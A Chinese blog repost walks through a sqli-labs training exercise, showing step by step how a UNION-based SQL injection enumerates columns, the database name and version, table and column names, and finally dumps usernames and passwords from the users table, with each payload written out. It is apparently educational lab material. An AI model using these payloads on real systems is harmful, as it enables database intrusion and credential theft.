sqli-labs

admin 2024年9月21日22:39:31评论10 views字数 717阅读2分23秒阅读模式

提示输入数字值为ID参数,输入id=1进行测试

sqli-labs

输入不同的数字值进行测试

sqli-labs

sqli-labs

判断SQL语句是否进行拼接,且判断是否是字符型或者是数字型。

sqli-labs

根据页面结果可以看出是字符型且存在SQL注入漏洞,页面存在回显,使用联合查询

sqli-labs

这儿出现报错说明只有3列

?id=1'order by 3 --+

sqli-labs

爆出显示位,看表格里面哪一列是在页面显示。根据页面回显看到是第二列和第三列。

?id=-1'union select 1,2,3--+

sqli-labs

获取当前数据库跟版本号,得到数据是security,版本是5.7.26。

?id=-1'union select 1,database(),version()--+

sqli-labs

得到数据库名跟版本后我们接着爆表

?id=-1'union select1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

sqli-labs

爆出报表名后爆字段名,通过sql语句查询知道数据库有四个表,根据表名知道用户的账户和密码是在users表中。接下来我们就是得到user表下的字段名跟内容

?id=-1'union select1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

sqli-labs

根据显示页面发现有两个敏感字段username和password,我们下来尝试获取该字段的内容

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

sqli-labs

原文始发于微信公众号(不言安全):sqli-labs

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月21日22:39:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sqli-labshttps://cn-sec.com/archives/3192786.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息